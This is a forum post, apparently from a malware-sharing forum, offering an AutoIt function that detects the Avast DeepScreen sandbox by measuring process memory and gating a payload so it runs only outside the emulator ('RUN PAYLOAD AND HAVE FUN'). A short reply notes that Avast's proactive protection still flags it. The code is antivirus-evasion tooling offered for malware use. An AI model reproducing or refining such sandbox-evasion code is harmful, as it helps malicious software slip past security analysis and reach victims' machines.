Ay los dejo este simple code para bypassear la DeepScreen de Avast

Feliz Navidad !!!

;========================================================================
; Func sAvastDeepScreenCheck
; Detect if file is running under Avast DeepScreen emulator environment
; Bypass Avast DeepScreen Emulators by Memory Usage
; Author : M3
; Forum : http://indetectables.net/forum.php
; Usage : sAvastDeepScreenCheck()
; Release : 12/12/2016
; Tested under Win7 32 / Win10 x64
;========================================================================



Local $sDeepScreenAllocatedBytes = 100000


Local $sCheck = sAvastDeepScreenCheck()



	If $sCheck > $sDeepScreenAllocatedBytes Then


		MsgBox(16 , "[ AVAST SANDBOX DETECTED ]" , "FILE IS RUNNING UNDER AVAST SANDBOX !!!" , 4)


	Else


		MsgBox(64 , "[ PROCESS UNDER SAFE ZONE ]" , "RUN PAYLOAD AND HAVE FUN !!!" , 4)


	EndIf




Func sAvastDeepScreenCheck()


	Local  $sGetCurrentProcess , $sStructParams , $sStructMemoryCount , $sSizeStruct , $sStructGetPtr , $sGetMemoryInfo , $sGetMemoryUsage


	$sGetCurrentProcess =  DllCall("kernel32.dll", "hwnd", "GetCurrentProcess")


	If @error Then Return


	$sGetCurrentProcess = $sGetCurrentProcess[0]


	$sStructParams = "dword; dword; uint workingsetsize; uint memorysize; uint; uint; uint; uint; uint; uint"


	$sStructMemoryCount = DllStructCreate($sStructParams)


	$sSizeStruct = DllStructGetSize($sStructMemoryCount)


	$sStructGetPtr = DllStructGetPtr($sStructMemoryCount)


	$sGetMemoryInfo = DllCall("Psapi.dll", "int", "GetProcessMemoryInfo", "hwnd", $sGetCurrentProcess, "ptr", $sStructGetPtr, "int", $sSizeStruct)


	$sGetMemoryUsage = DllStructGetData($sStructMemoryCount, "memorysize") / 1024


    Return $sGetMemoryUsage


EndFunc
Indetectables RAT v.0.9.5

@Indetectables Team
vou falar português pq ele entende.
quero ver bypassear a proactive do avast kkk
está detectando mesmo bypasseando o deepscreen do avast!
Responder

Volver a “Fuentes”